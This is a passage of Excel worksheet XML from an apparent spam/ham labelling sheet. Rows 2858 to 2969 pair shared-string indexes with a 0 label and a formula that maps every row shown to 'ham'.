        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2858" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2858" t="s">
        <v>21</v>
      </c>
      <c r="B2858">
        <v>0</v>
      </c>
      <c r="C2858" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2859" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2859" t="s">
        <v>2314</v>
      </c>
      <c r="B2859">
        <v>0</v>
      </c>
      <c r="C2859" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2860" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2860" t="s">
        <v>21</v>
      </c>
      <c r="B2860">
        <v>0</v>
      </c>
      <c r="C2860" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2861" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2861" t="s">
        <v>21</v>
      </c>
      <c r="B2861">
        <v>0</v>
      </c>
      <c r="C2861" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2862" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2862" t="s">
        <v>2315</v>
      </c>
      <c r="B2862">
        <v>0</v>
      </c>
      <c r="C2862" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2863" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2863" t="s">
        <v>21</v>
      </c>
      <c r="B2863">
        <v>0</v>
      </c>
      <c r="C2863" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2864" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2864" t="s">
        <v>2316</v>
      </c>
      <c r="B2864">
        <v>0</v>
      </c>
      <c r="C2864" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2865" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2865" t="s">
        <v>21</v>
      </c>
      <c r="B2865">
        <v>0</v>
      </c>
      <c r="C2865" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2866" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2866" t="s">
        <v>2317</v>
      </c>
      <c r="B2866">
        <v>0</v>
      </c>
      <c r="C2866" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2867" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2867" t="s">
        <v>2318</v>
      </c>
      <c r="B2867">
        <v>0</v>
      </c>
      <c r="C2867" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2868" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2868" t="s">
        <v>2319</v>
      </c>
      <c r="B2868">
        <v>0</v>
      </c>
      <c r="C2868" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2869" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2869" t="s">
        <v>2320</v>
      </c>
      <c r="B2869">
        <v>0</v>
      </c>
      <c r="C2869" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2870" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2870" t="s">
        <v>2321</v>
      </c>
      <c r="B2870">
        <v>0</v>
      </c>
      <c r="C2870" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2871" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2871" t="s">
        <v>2322</v>
      </c>
      <c r="B2871">
        <v>0</v>
      </c>
      <c r="C2871" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2872" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2872" t="s">
        <v>21</v>
      </c>
      <c r="B2872">
        <v>0</v>
      </c>
      <c r="C2872" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2873" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2873" t="s">
        <v>2323</v>
      </c>
      <c r="B2873">
        <v>0</v>
      </c>
      <c r="C2873" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2874" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2874" t="s">
        <v>2324</v>
      </c>
      <c r="B2874">
        <v>0</v>
      </c>
      <c r="C2874" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2875" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2875" t="s">
        <v>2325</v>
      </c>
      <c r="B2875">
        <v>0</v>
      </c>
      <c r="C2875" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2876" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2876" t="s">
        <v>2326</v>
      </c>
      <c r="B2876">
        <v>0</v>
      </c>
      <c r="C2876" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2877" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2877" t="s">
        <v>2327</v>
      </c>
      <c r="B2877">
        <v>0</v>
      </c>
      <c r="C2877" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2878" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2878" t="s">
        <v>2328</v>
      </c>
      <c r="B2878">
        <v>0</v>
      </c>
      <c r="C2878" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2879" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2879" t="s">
        <v>2329</v>
      </c>
      <c r="B2879">
        <v>0</v>
      </c>
      <c r="C2879" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2880" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2880" t="s">
        <v>2330</v>
      </c>
      <c r="B2880">
        <v>0</v>
      </c>
      <c r="C2880" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2881" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2881" t="s">
        <v>2331</v>
      </c>
      <c r="B2881">
        <v>0</v>
      </c>
      <c r="C2881" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2882" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2882" t="s">
        <v>2332</v>
      </c>
      <c r="B2882">
        <v>0</v>
      </c>
      <c r="C2882" t="str">
        <f t="shared" ref="C2882:C2945" si="45">IF(B2882="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="2883" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2883" t="s">
        <v>21</v>
      </c>
      <c r="B2883">
        <v>0</v>
      </c>
      <c r="C2883" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2884" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2884" t="s">
        <v>2333</v>
      </c>
      <c r="B2884">
        <v>0</v>
      </c>
      <c r="C2884" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2885" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2885" t="s">
        <v>21</v>
      </c>
      <c r="B2885">
        <v>0</v>
      </c>
      <c r="C2885" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2886" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2886" t="s">
        <v>2334</v>
      </c>
      <c r="B2886">
        <v>0</v>
      </c>
      <c r="C2886" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2887" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2887" t="s">
        <v>2335</v>
      </c>
      <c r="B2887">
        <v>0</v>
      </c>
      <c r="C2887" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2888" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2888" t="s">
        <v>2336</v>
      </c>
      <c r="B2888">
        <v>0</v>
      </c>
      <c r="C2888" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2889" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2889" t="s">
        <v>2337</v>
      </c>
      <c r="B2889">
        <v>0</v>
      </c>
      <c r="C2889" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2890" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2890" t="s">
        <v>21</v>
      </c>
      <c r="B2890">
        <v>0</v>
      </c>
      <c r="C2890" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2891" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2891" t="s">
        <v>2338</v>
      </c>
      <c r="B2891">
        <v>0</v>
      </c>
      <c r="C2891" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2892" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2892" t="s">
        <v>2339</v>
      </c>
      <c r="B2892">
        <v>0</v>
      </c>
      <c r="C2892" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2893" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2893" t="s">
        <v>2340</v>
      </c>
      <c r="B2893">
        <v>0</v>
      </c>
      <c r="C2893" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2894" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2894" t="s">
        <v>21</v>
      </c>
      <c r="B2894">
        <v>0</v>
      </c>
      <c r="C2894" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2895" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2895" t="s">
        <v>2341</v>
      </c>
      <c r="B2895">
        <v>0</v>
      </c>
      <c r="C2895" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2896" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2896" t="s">
        <v>2342</v>
      </c>
      <c r="B2896">
        <v>0</v>
      </c>
      <c r="C2896" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2897" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2897" t="s">
        <v>2343</v>
      </c>
      <c r="B2897">
        <v>0</v>
      </c>
      <c r="C2897" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2898" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2898" t="s">
        <v>2344</v>
      </c>
      <c r="B2898">
        <v>0</v>
      </c>
      <c r="C2898" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2899" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2899" t="s">
        <v>2345</v>
      </c>
      <c r="B2899">
        <v>0</v>
      </c>
      <c r="C2899" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2900" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2900" t="s">
        <v>21</v>
      </c>
      <c r="B2900">
        <v>0</v>
      </c>
      <c r="C2900" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2901" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2901" t="s">
        <v>2346</v>
      </c>
      <c r="B2901">
        <v>0</v>
      </c>
      <c r="C2901" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2902" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2902" t="s">
        <v>2347</v>
      </c>
      <c r="B2902">
        <v>0</v>
      </c>
      <c r="C2902" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2903" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2903" t="s">
        <v>2348</v>
      </c>
      <c r="B2903">
        <v>0</v>
      </c>
      <c r="C2903" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2904" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2904" t="s">
        <v>2349</v>
      </c>
      <c r="B2904">
        <v>0</v>
      </c>
      <c r="C2904" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2905" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2905" t="s">
        <v>2350</v>
      </c>
      <c r="B2905">
        <v>0</v>
      </c>
      <c r="C2905" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2906" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2906" t="s">
        <v>2351</v>
      </c>
      <c r="B2906">
        <v>0</v>
      </c>
      <c r="C2906" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2907" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2907" t="s">
        <v>2352</v>
      </c>
      <c r="B2907">
        <v>0</v>
      </c>
      <c r="C2907" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2908" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2908" t="s">
        <v>2353</v>
      </c>
      <c r="B2908">
        <v>0</v>
      </c>
      <c r="C2908" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2909" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2909" t="s">
        <v>2354</v>
      </c>
      <c r="B2909">
        <v>0</v>
      </c>
      <c r="C2909" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2910" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2910" t="s">
        <v>2355</v>
      </c>
      <c r="B2910">
        <v>0</v>
      </c>
      <c r="C2910" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2911" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2911" t="s">
        <v>2356</v>
      </c>
      <c r="B2911">
        <v>0</v>
      </c>
      <c r="C2911" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2912" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2912" t="s">
        <v>2357</v>
      </c>
      <c r="B2912">
        <v>0</v>
      </c>
      <c r="C2912" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2913" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2913" t="s">
        <v>2358</v>
      </c>
      <c r="B2913">
        <v>0</v>
      </c>
      <c r="C2913" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2914" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2914" t="s">
        <v>2359</v>
      </c>
      <c r="B2914">
        <v>0</v>
      </c>
      <c r="C2914" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2915" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2915" t="s">
        <v>2360</v>
      </c>
      <c r="B2915">
        <v>0</v>
      </c>
      <c r="C2915" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2916" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2916" t="s">
        <v>2361</v>
      </c>
      <c r="B2916">
        <v>0</v>
      </c>
      <c r="C2916" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2917" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2917" t="s">
        <v>2362</v>
      </c>
      <c r="B2917">
        <v>0</v>
      </c>
      <c r="C2917" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2918" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2918" t="s">
        <v>2363</v>
      </c>
      <c r="B2918">
        <v>0</v>
      </c>
      <c r="C2918" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2919" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2919" t="s">
        <v>2364</v>
      </c>
      <c r="B2919">
        <v>0</v>
      </c>
      <c r="C2919" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2920" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2920" t="s">
        <v>2365</v>
      </c>
      <c r="B2920">
        <v>0</v>
      </c>
      <c r="C2920" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2921" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2921" t="s">
        <v>2366</v>
      </c>
      <c r="B2921">
        <v>0</v>
      </c>
      <c r="C2921" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2922" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2922" t="s">
        <v>2367</v>
      </c>
      <c r="B2922">
        <v>0</v>
      </c>
      <c r="C2922" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2923" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2923" t="s">
        <v>2368</v>
      </c>
      <c r="B2923">
        <v>0</v>
      </c>
      <c r="C2923" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2924" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2924" t="s">
        <v>2369</v>
      </c>
      <c r="B2924">
        <v>0</v>
      </c>
      <c r="C2924" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2925" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2925" t="s">
        <v>2370</v>
      </c>
      <c r="B2925">
        <v>0</v>
      </c>
      <c r="C2925" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2926" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2926" t="s">
        <v>21</v>
      </c>
      <c r="B2926">
        <v>0</v>
      </c>
      <c r="C2926" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2927" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2927" t="s">
        <v>2371</v>
      </c>
      <c r="B2927">
        <v>0</v>
      </c>
      <c r="C2927" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2928" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2928" t="s">
        <v>2372</v>
      </c>
      <c r="B2928">
        <v>0</v>
      </c>
      <c r="C2928" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2929" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2929" t="s">
        <v>2373</v>
      </c>
      <c r="B2929">
        <v>0</v>
      </c>
      <c r="C2929" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2930" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2930" t="s">
        <v>2374</v>
      </c>
      <c r="B2930">
        <v>0</v>
      </c>
      <c r="C2930" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2931" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2931" t="s">
        <v>2375</v>
      </c>
      <c r="B2931">
        <v>0</v>
      </c>
      <c r="C2931" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2932" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2932" t="s">
        <v>2376</v>
      </c>
      <c r="B2932">
        <v>0</v>
      </c>
      <c r="C2932" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2933" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2933" t="s">
        <v>2377</v>
      </c>
      <c r="B2933">
        <v>0</v>
      </c>
      <c r="C2933" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2934" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2934" t="s">
        <v>2378</v>
      </c>
      <c r="B2934">
        <v>0</v>
      </c>
      <c r="C2934" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2935" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2935" t="s">
        <v>2379</v>
      </c>
      <c r="B2935">
        <v>0</v>
      </c>
      <c r="C2935" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2936" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2936" t="s">
        <v>2380</v>
      </c>
      <c r="B2936">
        <v>0</v>
      </c>
      <c r="C2936" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2937" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2937" t="s">
        <v>2381</v>
      </c>
      <c r="B2937">
        <v>0</v>
      </c>
      <c r="C2937" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2938" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2938" t="s">
        <v>2382</v>
      </c>
      <c r="B2938">
        <v>0</v>
      </c>
      <c r="C2938" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2939" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2939" t="s">
        <v>2383</v>
      </c>
      <c r="B2939">
        <v>0</v>
      </c>
      <c r="C2939" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2940" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2940" t="s">
        <v>2384</v>
      </c>
      <c r="B2940">
        <v>0</v>
      </c>
      <c r="C2940" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2941" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2941" t="s">
        <v>2385</v>
      </c>
      <c r="B2941">
        <v>0</v>
      </c>
      <c r="C2941" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2942" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2942" t="s">
        <v>21</v>
      </c>
      <c r="B2942">
        <v>0</v>
      </c>
      <c r="C2942" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2943" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2943" t="s">
        <v>2386</v>
      </c>
      <c r="B2943">
        <v>0</v>
      </c>
      <c r="C2943" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2944" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2944" t="s">
        <v>2387</v>
      </c>
      <c r="B2944">
        <v>0</v>
      </c>
      <c r="C2944" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2945" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2945" t="s">
        <v>2388</v>
      </c>
      <c r="B2945">
        <v>0</v>
      </c>
      <c r="C2945" t="str">
        <f t="shared" si="45"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2946" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2946" t="s">
        <v>2389</v>
      </c>
      <c r="B2946">
        <v>0</v>
      </c>
      <c r="C2946" t="str">
        <f t="shared" ref="C2946:C3009" si="46">IF(B2946="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="2947" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2947" t="s">
        <v>2390</v>
      </c>
      <c r="B2947">
        <v>0</v>
      </c>
      <c r="C2947" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2948" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2948" t="s">
        <v>2391</v>
      </c>
      <c r="B2948">
        <v>0</v>
      </c>
      <c r="C2948" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2949" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2949" t="s">
        <v>2392</v>
      </c>
      <c r="B2949">
        <v>0</v>
      </c>
      <c r="C2949" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2950" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2950" t="s">
        <v>21</v>
      </c>
      <c r="B2950">
        <v>0</v>
      </c>
      <c r="C2950" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2951" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2951" t="s">
        <v>2393</v>
      </c>
      <c r="B2951">
        <v>0</v>
      </c>
      <c r="C2951" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2952" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2952" t="s">
        <v>2394</v>
      </c>
      <c r="B2952">
        <v>0</v>
      </c>
      <c r="C2952" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2953" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2953" t="s">
        <v>2395</v>
      </c>
      <c r="B2953">
        <v>0</v>
      </c>
      <c r="C2953" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2954" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2954" t="s">
        <v>2396</v>
      </c>
      <c r="B2954">
        <v>0</v>
      </c>
      <c r="C2954" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2955" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2955" t="s">
        <v>2397</v>
      </c>
      <c r="B2955">
        <v>0</v>
      </c>
      <c r="C2955" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2956" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2956" t="s">
        <v>2398</v>
      </c>
      <c r="B2956">
        <v>0</v>
      </c>
      <c r="C2956" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2957" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2957" t="s">
        <v>2399</v>
      </c>
      <c r="B2957">
        <v>0</v>
      </c>
      <c r="C2957" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2958" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2958" t="s">
        <v>2400</v>
      </c>
      <c r="B2958">
        <v>0</v>
      </c>
      <c r="C2958" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2959" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2959" t="s">
        <v>2401</v>
      </c>
      <c r="B2959">
        <v>0</v>
      </c>
      <c r="C2959" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2960" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2960" t="s">
        <v>2402</v>
      </c>
      <c r="B2960">
        <v>0</v>
      </c>
      <c r="C2960" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2961" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2961" t="s">
        <v>2403</v>
      </c>
      <c r="B2961">
        <v>0</v>
      </c>
      <c r="C2961" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2962" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2962" t="s">
        <v>21</v>
      </c>
      <c r="B2962">
        <v>0</v>
      </c>
      <c r="C2962" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2963" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2963" t="s">
        <v>2404</v>
      </c>
      <c r="B2963">
        <v>0</v>
      </c>
      <c r="C2963" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2964" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2964" t="s">
        <v>21</v>
      </c>
      <c r="B2964">
        <v>0</v>
      </c>
      <c r="C2964" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2965" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2965" t="s">
        <v>2405</v>
      </c>
      <c r="B2965">
        <v>0</v>
      </c>
      <c r="C2965" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2966" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2966" t="s">
        <v>21</v>
      </c>
      <c r="B2966">
        <v>0</v>
      </c>
      <c r="C2966" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2967" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2967" t="s">
        <v>2406</v>
      </c>
      <c r="B2967">
        <v>0</v>
      </c>
      <c r="C2967" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2968" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2968" t="s">
        <v>2407</v>
      </c>
      <c r="B2968">
        <v>0</v>
      </c>
      <c r="C2968" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2969" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2969" t="s">
        <v>2408</v>
      </c>
      <c r="B2969">
        <v>0</v>
      </c>
      <c r="C2969" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
